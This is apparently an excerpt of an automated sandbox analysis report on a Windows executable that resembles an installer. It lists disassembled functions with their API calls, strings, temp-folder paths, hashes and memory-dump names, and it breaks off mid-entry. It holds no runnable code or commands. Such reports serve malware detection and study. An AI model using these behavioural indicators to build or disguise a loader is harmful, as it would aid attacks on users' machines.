Opcode ID: acad959dcb61790d49c9f598584ac5e86f9d1ccebe4d7eba3cd078971f6b2a85
Instruction ID: 4c0a073a0a50a016330575191a1a6545d3ec5be94f2f3c544cdbcd56c7493ec8
Opcode Fuzzy Hash: acad959dcb61790d49c9f598584ac5e86f9d1ccebe4d7eba3cd078971f6b2a85
Instruction Fuzzy Hash: A941C371900515BADF10BBA9DC46DAF3679DF05368B20423BF421F20E2D77C5A419AAD

Function 00402E62 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 175
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 00402ECA
GetTickCount.KERNEL32 ref: 00402F6F
MulDiv.KERNEL32(7FFFFFFF,00000064,00000020), ref: 00402F98
wsprintfA.USER32 ref: 00402FA8
WriteFile.KERNELBASE(00000000,00000000,0041AFD0,7FFFFFFF,00000000), ref: 00402FD6

Strings

... %d%%, xrefs: 00402FA2

Memory Dump Source

Source File: 00000001.00000002.13291985740.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.13291900588.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292052159.0000000000407000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292112907.0000000000409000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292112907.000000000042B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292112907.0000000000430000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292112907.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292112907.000000000043E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292112907.0000000000442000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292357718.0000000000445000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_temp_executable.jbxd

Similarity

API ID: CountTick$FileWritewsprintf
String ID: ... %d%%
API String ID: 4209647438-2449383134
Opcode ID: 1fa3e8c4adcc56b04dfbbc94917ea066f3dcbe6d9c1f3563fcd3960635240e7a
Instruction ID: 6a3fda1890073d0766cfbb54329871e7c274013a7bb5ca031e3128d44e3cc29a
Opcode Fuzzy Hash: 1fa3e8c4adcc56b04dfbbc94917ea066f3dcbe6d9c1f3563fcd3960635240e7a
Instruction Fuzzy Hash: 5F619D7190121A9BCF10DFA5DA44AAE7BBCAF40395F14413BF811B72D4C3789E50DBAA

Function 00401D26 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 38
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetDC.USER32(?), ref: 00401D29
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401D36
MulDiv.KERNEL32(00000000,00000002,00000000), ref: 00401D45
ReleaseDC.USER32(?,00000000), ref: 00401D56
CreateFontIndirectA.GDI32(0040A7C8), ref: 00401DA1

Strings

Tahoma, xrefs: 00401D87

Memory Dump Source

Source File: 00000001.00000002.13291985740.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.13291900588.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292052159.0000000000407000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292112907.0000000000409000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292112907.000000000042B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292112907.0000000000430000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292112907.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292112907.000000000043E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292112907.0000000000442000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292357718.0000000000445000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_temp_executable.jbxd

Similarity

API ID: CapsCreateDeviceFontIndirectRelease
String ID: Tahoma
API String ID: 3808545654-3580928618
Opcode ID: dd809f51fe667c0022c2dc729780a904305d67f997212ff511212824b15b7b7a
Instruction ID: 2cbf7b26bffa346353c04d8a5f9262401d36b0fa9ffcbdeb30b58970b6715d39
Opcode Fuzzy Hash: dd809f51fe667c0022c2dc729780a904305d67f997212ff511212824b15b7b7a
Instruction Fuzzy Hash: 46018671955380AFEB019BB0AF0AB9A3FB4E715705F20843AF141BB2E2C5B95411DB2F

Function 00401F68 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 73
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleA.KERNELBASE(00000000,00000001,000000F0), ref: 00401F93

Part of subcall function 00404E7C: lstrlenA.KERNEL32(00429000,00000000,0041AFD0,764D23A0,?,?,?,?,?,?,?,?,?,00402FBC,00000000,?), ref: 00404EB5
Part of subcall function 00404E7C: lstrlenA.KERNEL32(00402FBC,00429000,00000000,0041AFD0,764D23A0,?,?,?,?,?,?,?,?,?,00402FBC,00000000), ref: 00404EC5
Part of subcall function 00404E7C: lstrcatA.KERNEL32(00429000,00402FBC,00402FBC,00429000,00000000,0041AFD0,764D23A0), ref: 00404ED8
Part of subcall function 00404E7C: SetWindowTextA.USER32(00429000,00429000), ref: 00404EEA
Part of subcall function 00404E7C: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404F10
Part of subcall function 00404E7C: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404F2A
Part of subcall function 00404E7C: SendMessageA.USER32(?,00001013,?,00000000), ref: 00404F38

LoadLibraryExA.KERNELBASE(00000000,?,00000008,00000001,000000F0), ref: 00401FA3
GetProcAddress.KERNEL32(00000000,?), ref: 00401FB3
FreeLibrary.KERNELBASE(00000000,00000000,000000F7,?,?,00000008,00000001,000000F0), ref: 0040201D

Strings

B, xrefs: 00401FDD

Memory Dump Source

Source File: 00000001.00000002.13291985740.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.13291900588.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292052159.0000000000407000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292112907.0000000000409000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292112907.000000000042B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292112907.0000000000430000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292112907.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292112907.000000000043E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292112907.0000000000442000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292357718.0000000000445000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_temp_executable.jbxd

Similarity

API ID: MessageSend$Librarylstrlen$AddressFreeHandleLoadModuleProcTextWindowlstrcat
String ID: B
API String ID: 2987980305-2386870291
Opcode ID: 5d921ce9d38de86033110977b9fdd779e0c94be56204488395bd4138c4a8313f
Instruction ID: c9057b5ece4bb598837aab6aa7fd84f94fd7ed62459683fea6a67aa899d5519e
Opcode Fuzzy Hash: 5d921ce9d38de86033110977b9fdd779e0c94be56204488395bd4138c4a8313f
Instruction Fuzzy Hash: 7B212B32904215F7DB107FA5CE4DA6E39B0AB48358F70823BF600B62D0DBBC4D419A6E

Function 004015B3 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 58
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 004056BA: CharNextA.USER32(?,?,0042AC28,?,00405726,0042AC28,0042AC28,?,?,764D3410,00405471,?,C:\Users\user\AppData\Local\Temp\,764D3410,00000000), ref: 004056C8
Part of subcall function 004056BA: CharNextA.USER32(00000000), ref: 004056CD
Part of subcall function 004056BA: CharNextA.USER32(00000000), ref: 004056E1

CreateDirectoryA.KERNELBASE(00000000,?,00000000,0000005C,00000000,000000F0), ref: 004015DB
GetLastError.KERNEL32(?,00000000,0000005C,00000000,000000F0), ref: 004015E5
GetFileAttributesA.KERNELBASE(00000000,?,00000000,0000005C,00000000,000000F0), ref: 004015F3
SetCurrentDirectoryA.KERNELBASE(00000000,C:\Users\user\AppData\Local\Temp\Pindebrndes\normalitetens\Sweatsuit,00000000,00000000,000000F0), ref: 00401622

Strings

C:\Users\user\AppData\Local\Temp\Pindebrndes\normalitetens\Sweatsuit, xrefs: 00401617

Memory Dump Source

Source File: 00000001.00000002.13291985740.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.13291900588.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292052159.0000000000407000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292112907.0000000000409000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292112907.000000000042B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292112907.0000000000430000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292112907.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292112907.000000000043E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292112907.0000000000442000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292357718.0000000000445000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_temp_executable.jbxd

Similarity

API ID: CharNext$Directory$AttributesCreateCurrentErrorFileLast
String ID: C:\Users\user\AppData\Local\Temp\Pindebrndes\normalitetens\Sweatsuit
API String ID: 3751793516-378292206
Opcode ID: 12e5a36d5edc16662757fda151b16d574b2b14abbda879b5f82fb507a9edc51b
Instruction ID: baf4b22be7c240c0249859998ea5247985aaf7e7583e011f11e43f36ca2efb08
Opcode Fuzzy Hash: 12e5a36d5edc16662757fda151b16d574b2b14abbda879b5f82fb507a9edc51b
Instruction Fuzzy Hash: 45112531908150ABEB113F755D449AF37B0EA66365728473BF491B22E2C23C0D42962E

Function 00405851 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 33
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 00405865
GetTempFileNameA.KERNELBASE(?,?,00000000,?), ref: 0040587F

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00405854, 00405858
nsa, xrefs: 0040585C
"C:\Users\user\AppData\Local\Temp\temp_executable.exe" , xrefs: 00405851

Memory Dump Source

Source File: 00000001.00000002.13291985740.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.13291900588.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292052159.0000000000407000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292112907.0000000000409000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292112907.000000000042B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292112907.0000000000430000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292112907.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292112907.000000000043E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292112907.0000000000442000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292357718.0000000000445000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_temp_executable.jbxd

Similarity

API ID: CountFileNameTempTick
String ID: "C:\Users\user\AppData\Local\Temp\temp_executable.exe" $C:\Users\user\AppData\Local\Temp\$nsa
API String ID: 1716503409-2239874019
Opcode ID: 165f25902c12276048ad14c3faa9af412f6aa489c6d0a6d50344be84ac3f20e0
Instruction ID: 4003a4fe6d6a1be2c7c6231cfd42d77a102930ba0be0d4b8b296abf0166e01cb
Opcode Fuzzy Hash: 165f25902c12276048ad14c3faa9af412f6aa489c6d0a6d50344be84ac3f20e0
Instruction Fuzzy Hash: 7CF05E366482086ADB109A56DC44F9A7B99DB95750F14C02AF904AA180D6B099548B59

Function 100016DA Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 118
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 10001A86: GlobalFree.KERNEL32(?), ref: 10001CED
Part of subcall function 10001A86: GlobalFree.KERNEL32(?), ref: 10001CF2
Part of subcall function 10001A86: GlobalFree.KERNEL32(?), ref: 10001CF7

GlobalFree.KERNEL32(00000000), ref: 10001785
FreeLibrary.KERNEL32(?), ref: 100017FC
GlobalFree.KERNEL32(00000000), ref: 10001821

Part of subcall function 100021CE: GlobalAlloc.KERNEL32(00000040,FFFFFF25), ref: 10002200

Part of subcall function 100025A2: GlobalAlloc.KERNEL32(00000040,?,?,?,00000000,?,?,?,?,10001756,00000000), ref: 10002614

Part of subcall function 10001576: lstrcpyA.KERNEL32(00000000,?,00000000,100016B2,00000000), ref: 1000158F

Part of subcall function 100023D6: wsprintfA.USER32 ref: 1000243D
Part of subcall function 100023D6: GlobalFree.KERNEL32(?), ref: 100024F0
Part of subcall function 100023D6: GlobalFree.KERNEL32(00000000), ref: 10002519

Strings

, xrefs: 10001802

Memory Dump Source

Source File: 00000001.00000002.13297986695.0000000010001000.00000020.00000001.01000000.00000008.sdmp, Offset: 10000000, based on PE: true

Associated: 00000001.00000002.13297947944.0000000010000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.13298021849.0000000010003000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.13298062331.0000000010005000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_10000000_temp_executable.jbxd

Similarity

API ID: Global$Free$Alloc$Librarylstrcpywsprintf
String ID:
API String ID: 1767494692-3916222277
Opcode ID: 80c1eb4dc1bb9434ef57333ea610fa1f90e3e1b5418920c54ad1d83e70a562f5
Instruction ID: 934e7617fa40043d42386ee9ca144464bf73cca2219d0ab945a4c64a7ea5d568
Opcode Fuzzy Hash: 80c1eb4dc1bb9434ef57333ea610fa1f90e3e1b5418920c54ad1d83e70a562f5
Instruction Fuzzy Hash: BA31AD758046059AFB41DF649CC6BDA37ECFF052D0F008425F90AAA19EDFB499458BA0

Function 00401BB8 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 76
windowtimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SendMessageTimeoutA.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C18
SendMessageA.USER32(00000000,00000000,?,?), ref: 00401C30

Strings

!, xrefs: 00401BEC

Memory Dump Source

Source File: 00000001.00000002.13291985740.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.13291900588.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292052159.0000000000407000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292112907.0000000000409000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292112907.000000000042B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292112907.0000000000430000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292112907.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292112907.000000000043E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292112907.0000000000442000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292357718.0000000000445000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_temp_executable.jbxd

Similarity

API ID: MessageSend$Timeout
String ID: !
API String ID: 1777923405-2657877971
Opcode ID: 7b0f966d21450dab21967011264f0b2a79b9c118bf8cbf56b5803b2581db9112
Instruction ID: 6b987b391dfe704e5e25f8c5ed1974f346454cd13820caa224fece71ffdffe90
Opcode Fuzzy Hash: 7b0f966d21450dab21967011264f0b2a79b9c118bf8cbf56b5803b2581db9112
Instruction Fuzzy Hash: D621B0B1A04208BFEF01AFB4CD4AAAE7BB5EF44344F10053EF541B61D1D6B89940D728

Function 004030AE Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 20COMMON

Download Yara Rule

APIs

Part of subcall function 00405DFC: CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\AppData\Local\Temp\temp_executable.exe" ,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004030BA,C:\Users\user\AppData\Local\Temp\,764D3410,00403294), ref: 00405E54
Part of subcall function 00405DFC: CharNextA.USER32(?,?,?,00000000), ref: 00405E61
Part of subcall function 00405DFC: CharNextA.USER32(?,"C:\Users\user\AppData\Local\Temp\temp_executable.exe" ,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004030BA,C:\Users\user\AppData\Local\Temp\,764D3410,00403294), ref: 00405E66
Part of subcall function 00405DFC: CharPrevA.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004030BA,C:\Users\user\AppData\Local\Temp\,764D3410,00403294), ref: 00405E76

CreateDirectoryA.KERNELBASE(C:\Users\user\AppData\Local\Temp\,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,764D3410,00403294), ref: 004030CF

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 004030AF, 004030B4, 004030BA, 004030C6, 004030CE, 004030D5
1033, xrefs: 004030D6

Memory Dump Source

Source File: 00000001.00000002.13291985740.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.13291900588.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292052159.0000000000407000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292112907.0000000000409000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292112907.000000000042B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292112907.0000000000430000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292112907.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292112907.000000000043E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292112907.0000000000442000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292357718.0000000000445000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_temp_executable.jbxd

Similarity

API ID: Char$Next$CreateDirectoryPrev
String ID: 1033$C:\Users\user\AppData\Local\Temp\
API String ID: 4115351271-2414109610
Opcode ID: 1ea2b1deb2575fa16d86268b89c9853e92957c035c0675f288212a8b63e03b10
Instruction ID: eecbd6f84ea8616cf4882f1a33e1516d07f24589ae5fd842fb1f34df92f4a8b9
Opcode Fuzzy Hash: 1ea2b1deb2575fa16d86268b89c9853e92957c035c0675f288212a8b63e03b10
Instruction Fuzzy Hash: EBD05E1141AC3022C42133263C0AFCF040C8F06719F918437F408710C24A2E098345EE

Function 00401B11 Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 72memoryCOMMON

Download Yara Rule

APIs

GlobalFree.KERNEL32(00000000), ref: 00401B80
GlobalAlloc.KERNELBASE(00000040,00000404), ref: 00401B92

Strings

Call, xrefs: 00401B38, 00401B3E, 00401B58

Memory Dump Source

Source File: 00000001.00000002.13291985740.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.13291900588.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292052159.0000000000407000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292112907.0000000000409000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292112907.000000000042B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292112907.0000000000430000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292112907.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292112907.000000000043E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292112907.0000000000442000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292357718.0000000000445000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_temp_executable.jbxd

Similarity

API ID: Global$AllocFree
String ID: Call
API String ID: 3394109436-1824292864
Opcode ID: bc367c68fc988450a7838e96f05bf1e26fe43bbd001d03be4b8de090aadb1637
Instruction ID: 9717a96cc82752b9745dda345e5f929d8d53b2d10d66f9bc57db5fd7b1196717
Opcode Fuzzy Hash: bc367c68fc988450a7838e96f05bf1e26fe43bbd001d03be4b8de090aadb1637
Instruction Fuzzy Hash: C221A172A04211ABD710ABA48A8995E73B8EB44714714857BF501B32D1D7BCF8109B1E

Function 00405A78 Relevance: 4.5, APIs: 3, Instructions: 45registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.KERNELBASE(80000002,00405CBD,00000000,00000002,?,00000002,?,?,00405CBD,80000002,Software\Microsoft\Windows\CurrentVersion,?,Call,?), ref: 00405AA1
RegQueryValueExA.KERNELBASE(?,?,00000000,00405CBD,?,00405CBD), ref: 00405AC2
RegCloseKey.KERNELBASE(?), ref: 00405AE3

Memory Dump Source

Source File: 00000001.00000002.13291985740.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.13291900588.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292052159.0000000000407000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292112907.0000000000409000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292112907.000000000042B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292112907.0000000000430000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292112907.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292112907.000000000043E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292112907.0000000000442000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292357718.0000000000445000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_temp_executable.jbxd

Similarity

API ID: CloseOpenQueryValue
String ID:
API String ID: 3677997916-0
Opcode ID: a7dc294ab98d1aedf48ab84cf89b8b0d9a3be53888eb2216a8b2e534b80ab0d4
Instruction ID: 243cde366d026c4bbee3ae285cd60e09c1ede4c2eb0dd04642378b8e862c63c5
Opcode Fuzzy Hash: a7dc294ab98d1aedf48ab84cf89b8b0d9a3be53888eb2216a8b2e534b80ab0d4
Instruction Fuzzy Hash: 1F01487114020AEFDB128F65EC84AEB3FACEF14354F004126F905A6220D235D964CFB5

Function 0040243A Relevance: 4.5, APIs: 3, Instructions: 44registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00402B07: RegOpenKeyExA.KERNELBASE(00000000,000000EB,00000000,00000022,00000000,?,?), ref: 00402B2F

RegEnumKeyA.ADVAPI32(00000000,00000000,?,000003FF), ref: 00402468
RegEnumValueA.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?), ref: 0040247B
RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nsfBB16.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 00402490

Memory Dump Source

Source File: 00000001.00000002.13291985740.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.13291900588.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292052159.0000000000407000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292112907.0000000000409000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292112907.000000000042B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292112907.0000000000430000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292112907.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292112907.000000000043E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292112907.0000000000442000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292357718.0000000000445000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_temp_executable.jbxd

Similarity

API ID: Enum$CloseOpenValue
String ID:
API String ID: 167947723-0
Opcode ID: 44a302db6482d8f83742b1e3beb1e5c4981743e928843549fc1dace8f48bd082
Instruction ID: 1e99a264a9944b222e34705325ef89c31e77f1871a72d34f0e2539f6998fac94
Opcode Fuzzy Hash: 44a302db6482d8f83742b1e3beb1e5c4981743e928843549fc1dace8f48bd082
Instruction Fuzzy Hash: 5BF0D172A04200EFE7119F659E8CEBF7A6CEB40348F10443EF441B62C0D6B85E41966A

Function 10002800 Relevance: 3.2, APIs: 2, Instructions: 156memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(00000000), ref: 100028BF
GetLastError.KERNEL32 ref: 100029C6

Memory Dump Source

Source File: 00000001.00000002.13297986695.0000000010001000.00000020.00000001.01000000.00000008.sdmp, Offset: 10000000, based on PE: true

Associated: 00000001.00000002.13297947944.0000000010000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.13298021849.0000000010003000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.13298062331.0000000010005000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_10000000_temp_executable.jbxd

Similarity

API ID: AllocErrorLastVirtual
String ID:
API String ID: 497505419-0
Opcode ID: 670f03678a5eaf619360d21028c39b4414a5d41f5967bb61c5d6db3b3f09e835
Instruction ID: e4aa2bd3e495effe50d9526cbc68d205f519acfcad6f3d50ccedb804016fbdef
Opcode Fuzzy Hash: 670f03678a5eaf619360d21028c39b4414a5d41f5967bb61c5d6db3b3f09e835
Instruction Fuzzy Hash: 8D5162BA908215DFFB10DFA4DCC675937B4EB443D5F21842AEA08E722DDF34A9808B54

Function 004023C8 Relevance: 3.1, APIs: 2, Instructions: 56registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00402B07: RegOpenKeyExA.KERNELBASE(00000000,000000EB,00000000,00000022,00000000,?,?), ref: 00402B2F

RegQueryValueExA.ADVAPI32(00000000,00000000,?,?,?,?), ref: 004023F8
RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nsfBB16.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 00402490

Memory Dump Source

Source File: 00000001.00000002.13291985740.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.13291900588.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292052159.0000000000407000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292112907.0000000000409000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292112907.000000000042B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292112907.0000000000430000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292112907.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292112907.000000000043E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292112907.0000000000442000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292357718.0000000000445000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_temp_executable.jbxd

Similarity

API ID: CloseOpenQueryValue
String ID:
API String ID: 3677997916-0
Opcode ID: d5b49ddab0cd4e2ea66004b9ca03d90090f65eaedbc84a66a30e005ee5890498
Instruction ID: 062f64408cc8674e1b050eceadd28ab238dc71c9c97f21e558eb7ec8d4e55ee6
